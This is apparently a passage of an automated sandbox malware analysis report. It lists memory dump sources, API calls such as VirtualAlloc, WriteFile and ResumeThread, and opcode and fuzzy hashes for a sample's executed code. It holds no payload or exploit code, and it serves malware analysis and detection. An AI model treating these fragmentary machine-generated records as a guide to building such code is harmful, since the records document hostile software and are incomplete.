                                                                                                                                                                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B30FFF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                          • API String ID: 1091760877-2248577382
                                                                                                                                                                          • Opcode ID: ca7adca6f9327e6ff1ffc7572bd4ef05365010da9332f91dc3f8d7c66ec270c1
                                                                                                                                                                          • Instruction ID: 19a65e696fd75d68e664136a38d4da008e8e98cd3bab6b0b9a1742f597968fb4
                                                                                                                                                                          • Opcode Fuzzy Hash: ca7adca6f9327e6ff1ffc7572bd4ef05365010da9332f91dc3f8d7c66ec270c1
                                                                                                                                                                          • Instruction Fuzzy Hash: D9D05B7250C73076C61137286C06F6F3984DB11772F640BD4F53D553F5CF1549915696
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00B2DA55,?), ref: 00B2E2A3
                                                                                                                                                                          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00B2DA55,?), ref: 00B2E2B1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindHandleModuleResource
                                                                                                                                                                          • String ID: RTL
                                                                                                                                                                          • API String ID: 3537982541-834975271
                                                                                                                                                                          • Opcode ID: cfbb8d927b45a0f91486c1ab6512984b2de0c587f454b7a1cff85eb530d71597
                                                                                                                                                                          • Instruction ID: daaeaced523b694cc3aba637bc3c0d69c1cc2d6213a2c39e67d9ef062519e5d1
                                                                                                                                                                          • Opcode Fuzzy Hash: cfbb8d927b45a0f91486c1ab6512984b2de0c587f454b7a1cff85eb530d71597
                                                                                                                                                                          • Instruction Fuzzy Hash: 62C0123124071066E67057757C0DB47AAD85B00F92F0904CCB545EA3D1DAA5C54486A0

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:13.5%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:34
                                                                                                                                                                          Total number of Limit Nodes:4

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1961046280.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFileTransacted
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2149338676-0

Control-flow Graph

[Graph image not preserved. First block at 7ffd9b9ed2f5; API call: WriteFile. Node legend: Executed / Not Executed.]
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1961046280.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3934441357-0

Control-flow Graph

[Graph image not preserved. First block at 7ffd9b9eec5a; API call: GetSystemInfo. Node legend: Executed / Not Executed.]
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1961046280.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 31276548-0

Control-flow Graph

[Graph image not preserved. First block at 7ffd9ba50897; API call: ResumeThread. Node legend: Executed / Not Executed.]
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1961046280.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 947044025-0

Control-flow Graph

[Graph image not preserved. First block at 7ffd9b9eec91; API call: GetSystemInfo. Node legend: Executed / Not Executed.]
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1961046280.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 31276548-0

Control-flow Graph

[Graph image not preserved. First block at 7ffd9b9ef0f5; API call: VirtualAlloc. Node legend: Executed / Not Executed.]
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1961046280.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9b9e0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4275171209-0

Control-flow Graph

[Graph image not preserved. First block at 7ffd9bbb55e8; calls 7ffd9bbb0c48. Node legend: Executed / Not Executed.]
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 0-3916222277

Control-flow Graph

[Graph image not preserved. First block at 7ffd9bf7a748; calls 7ffd9bf76b10. Node legend: Executed / Not Executed.]
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 0-3916222277

                                                                                                                                                                          • Instruction Fuzzy Hash: 7AC1E13061A55A8BEB29CF58C0F05B637A1FF45308B5545BDC88B8B6DBCA78F581CB42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 381859be3fd02235c34fea0f53e9e5c5841fe8bbdd03a13a69421757f5d0b0ed
                                                                                                                                                                          • Instruction ID: e6bdd0f480ffb4f001decd194a0c005284883093464efeed009ca9cf924cdcc3
                                                                                                                                                                          • Opcode Fuzzy Hash: 381859be3fd02235c34fea0f53e9e5c5841fe8bbdd03a13a69421757f5d0b0ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 89C1043061A54A9BEB2DCF48D4E05B137A1FF45300B5146FDC84B8B69BDA39F686CB81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 626a04c611a63e216d94911d7f25c2a5c1e130fa55dbed9f954da7085a140f0d
                                                                                                                                                                          • Instruction ID: dfcb0d2d9111cd85ac946290a7ef57c086d84c805f106130c1aa71b793bb8633
                                                                                                                                                                          • Opcode Fuzzy Hash: 626a04c611a63e216d94911d7f25c2a5c1e130fa55dbed9f954da7085a140f0d
                                                                                                                                                                          • Instruction Fuzzy Hash: E5C1C23061954A8BEB2DCF58D0E05B137A1FF45301B6646FDC84B8B69BDA39F981CB81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1a8e0b46644605a1699b5336d76d5e38c735857abd70153dc5f034bc98fbf04c
                                                                                                                                                                          • Instruction ID: 3485f86ad4d5670817a8662377135eb5fafebc8895c614bb520808cb6a041a13
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a8e0b46644605a1699b5336d76d5e38c735857abd70153dc5f034bc98fbf04c
                                                                                                                                                                          • Instruction Fuzzy Hash: 89C1F130B0AA4A8FE759DB68C0B16A5B7A1FF18304F5541BDC04EC7BD6CB68B951CB81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1c44090bbe402ad0844c5717a0c1e21a98a6b7227cc34e62d63d54bd1cef1095
                                                                                                                                                                          • Instruction ID: 126fe9106fb62c09299146f491ea48af9809cf7904268ec370f018212e1f6e1e
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c44090bbe402ad0844c5717a0c1e21a98a6b7227cc34e62d63d54bd1cef1095
                                                                                                                                                                          • Instruction Fuzzy Hash: CE319012F1E19B86F6396AA464F15B866D0DF15210F1B07FAD48E870E6CC2FAE445382
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 660b735bbc1f2f48b50caa6003278573d27986b8a8442e6176166a4a5423c7db
                                                                                                                                                                          • Instruction ID: 1b65cc1b08422de5eb73b8f978e77d69b210b60a6e5d6232272418dd89dc4424
                                                                                                                                                                          • Opcode Fuzzy Hash: 660b735bbc1f2f48b50caa6003278573d27986b8a8442e6176166a4a5423c7db
                                                                                                                                                                          • Instruction Fuzzy Hash: 6EB11630B0EA4A4FEB59DB68C0A16A5B7A1FF15304F4545B9C04EC7AE7DB28F951CB80
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f7816cf5e159f7cae747d0d468aa85bb539304b7220c03e1891c70dc761d5bee
                                                                                                                                                                          • Instruction ID: 58f4c299542e09bc7fbb9f5e2f42edd5fcee8b8f8551a97c61d17554ecf4271f
                                                                                                                                                                          • Opcode Fuzzy Hash: f7816cf5e159f7cae747d0d468aa85bb539304b7220c03e1891c70dc761d5bee
                                                                                                                                                                          • Instruction Fuzzy Hash: 2121DB23F0F69B8BFB756EF854F18F85650DF10A60B0A03FAD49E870E2CC4E69555286
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5918355145e3452dc85d80c946d2130d159751e1e92c5f1b86ec75fec6523632
                                                                                                                                                                          • Instruction ID: c429607e6f492569703994b97d063ea24150abde386afc3f11dda686c1e200cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 5918355145e3452dc85d80c946d2130d159751e1e92c5f1b86ec75fec6523632
                                                                                                                                                                          • Instruction Fuzzy Hash: E7B1F430A0DA4E8FE759DF68C0A06A0B7A1FF14300F5642F9C04EC7A96CB29F951CB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f94db8ba07dcfdffba0cedcd5a18bc9c10b4155216a4898b82b8658148e5b9bd
                                                                                                                                                                          • Instruction ID: 4b2b4a097c077cbbe3461ff0646f637ae57ccf4f17720086134f62fb09d18c50
                                                                                                                                                                          • Opcode Fuzzy Hash: f94db8ba07dcfdffba0cedcd5a18bc9c10b4155216a4898b82b8658148e5b9bd
                                                                                                                                                                          • Instruction Fuzzy Hash: D7919230B18A1D8FDB58DB58C899AB9B3E2FF59314B5541A9D04EC72A6CA31EC42CB40
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a4a4ae394db90c602f45f940c31a58ee2b39ae4dddc9bad661c0cc031b510523
                                                                                                                                                                          • Instruction ID: 54e8ffad272cc39485d95f1686cd2475a05b1111944913f9506aa12efaa4e781
                                                                                                                                                                          • Opcode Fuzzy Hash: a4a4ae394db90c602f45f940c31a58ee2b39ae4dddc9bad661c0cc031b510523
                                                                                                                                                                          • Instruction Fuzzy Hash: 48B1D17061A6059FEB49CF48D4E06B137A1FF49310B5142FCC84A8B69BD739FA86CB81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a352bb8fa48e28bdde45d461f013acbb253baf4a3e65eba88ea3df363b51a259
                                                                                                                                                                          • Instruction ID: a7330bfe51643ec7ac920c647e6aa6f54b5b7e7dd0c1aa2c28f76e02ffad960e
                                                                                                                                                                          • Opcode Fuzzy Hash: a352bb8fa48e28bdde45d461f013acbb253baf4a3e65eba88ea3df363b51a259
                                                                                                                                                                          • Instruction Fuzzy Hash: 50214B11F0F2AB8AF67956E4B4754BE6F407F50318F2A01B6C45E860F6CC4D3A491B82
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Instruction ID: 47ba74c0d72a633df96630b3ca3fe80347fb10ab2d5e5a0d2a2071e49d1e000b
                                                                                                                                                                          • Opcode Fuzzy Hash: 00e7439fdae42d7b46888b3ce0897c43ffb8f361ed20550edf085980ba07a780
                                                                                                                                                                          • Instruction Fuzzy Hash: BA510431B2E54D4FF778DE5888A65B577D0EF94310B0603F9D09EC35B2DA1AEA058781
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6e54e4d5621189564fdc2713dd613168be1a2c7bd22696355e667ba6550dd949
                                                                                                                                                                          • Instruction ID: b075c7b3611fe834815c8fc03fce4c572251671d45dce36eb451a235c83a1319
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e54e4d5621189564fdc2713dd613168be1a2c7bd22696355e667ba6550dd949
                                                                                                                                                                          • Instruction Fuzzy Hash: C5515F70E0955D8FDF94EFA8D854AEDBBB1FF55304F11006AD00DE7296DA34A981CB40
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6027f693e81207c993319c7d8d7e1458768af271c87d07415148cb2274209d17
                                                                                                                                                                          • Instruction ID: d9c2cba7931a9ebf5d269077682a36a3c35ba8faf98938e5611ed22f9fc2a50d
                                                                                                                                                                          • Opcode Fuzzy Hash: 6027f693e81207c993319c7d8d7e1458768af271c87d07415148cb2274209d17
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E510472F0E95E5FEB64DAA8C8615BAB7A1FF55314B05017AD04EC32D2CE24B912CB80
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 34d714b380876ffd75003842ebaf24710f6898f43cc54d934d9493b1c8d5010b
                                                                                                                                                                          • Instruction ID: e20d69289b0113fe33772689ad9033d04830398ddee4aa5e794fca4a2b11cd83
                                                                                                                                                                          • Opcode Fuzzy Hash: 34d714b380876ffd75003842ebaf24710f6898f43cc54d934d9493b1c8d5010b
                                                                                                                                                                          • Instruction Fuzzy Hash: 08519032E1954E8EEF65DFB8C4A05BCBBB1FF59704F1506B9D00AC72A2DA25AA41C700
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 24eca10c1e392851a0dd5f320b56e75bdd8adaa79cba28ff24ae80afb444cebd
                                                                                                                                                                          • Instruction ID: 7aef7499eac69f3dec6e420af78c199cf16b38c55f0f70589d0218ef90b5acaa
                                                                                                                                                                          • Opcode Fuzzy Hash: 24eca10c1e392851a0dd5f320b56e75bdd8adaa79cba28ff24ae80afb444cebd
                                                                                                                                                                          • Instruction Fuzzy Hash: 9951A031E1955E8FEB69DBA884A15FE7BB0FF54304F5501BAC00EC71E2DE286946CB40
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 91a5e878032e812cf5760ed5cf30a1fccf7f89cae8426b2c99b9012778e7322d
                                                                                                                                                                          • Instruction ID: cd965117a6a756ca9bc249f200b91d5f37d31a8b4446c147e03f6d24cabbae43
                                                                                                                                                                          • Opcode Fuzzy Hash: 91a5e878032e812cf5760ed5cf30a1fccf7f89cae8426b2c99b9012778e7322d
                                                                                                                                                                          • Instruction Fuzzy Hash: A551F971A1D95E8EEB78DB5484B4BF977A1FF94300F1242F9C04EC7196CE39AA808B41
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 26910472bea9ba4234ab52669e8f24e5c7cd8c96cc36716a771f3176b4e52bed
                                                                                                                                                                          • Instruction ID: 28fbcf0b9b15037b719b23f758005a3f8fab138548117efb71a73cdd247d391e
                                                                                                                                                                          • Opcode Fuzzy Hash: 26910472bea9ba4234ab52669e8f24e5c7cd8c96cc36716a771f3176b4e52bed
                                                                                                                                                                          • Instruction Fuzzy Hash: E0417B31B0E60A4FE7789D5898E247577D1EF45310B1206BEE4CFC32A2DD26FB064252
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bf70000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 32bb1e7775d2a33239a36e838c1e86742c74023a6ba1685d792ee42827837399
                                                                                                                                                                          • Instruction ID: 577f08ba2110e8ccd0fe31fd62924bcb822b7c9911ffb36ce1dc15986cdec3db
                                                                                                                                                                          • Opcode Fuzzy Hash: 32bb1e7775d2a33239a36e838c1e86742c74023a6ba1685d792ee42827837399
                                                                                                                                                                          • Instruction Fuzzy Hash: E2519370B1A90A5BEB58EF98C0A06B5B3A1FF59300F4542B9C40EC3A96DF35F9518780
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1963124460.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffd9bbb0000_hypersurrogateComponentdhcp.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 85d8ea6c3ff0c7750e036059c4375cac896d902ca87443ce9a56fa09a01c7d92
                                                                                                                                                                          • Instruction ID: 75854fe043a3f4c7b7e928686794c79ec3bfd1615d0dd4beefa4c33d9832ea2b
                                                                                                                                                                          • Opcode Fuzzy Hash: 85d8ea6c3ff0c7750e036059c4375cac896d902ca87443ce9a56fa09a01c7d92
                                                                                                                                                                          • Instruction Fuzzy Hash: 5F41A43270C9198FDF98EF58C0A5DA9B3E1FBA8314B0441AAD44EC7692DE25EC55CB81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.1971858524.00007FFD9BF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF70000, based on PE: false
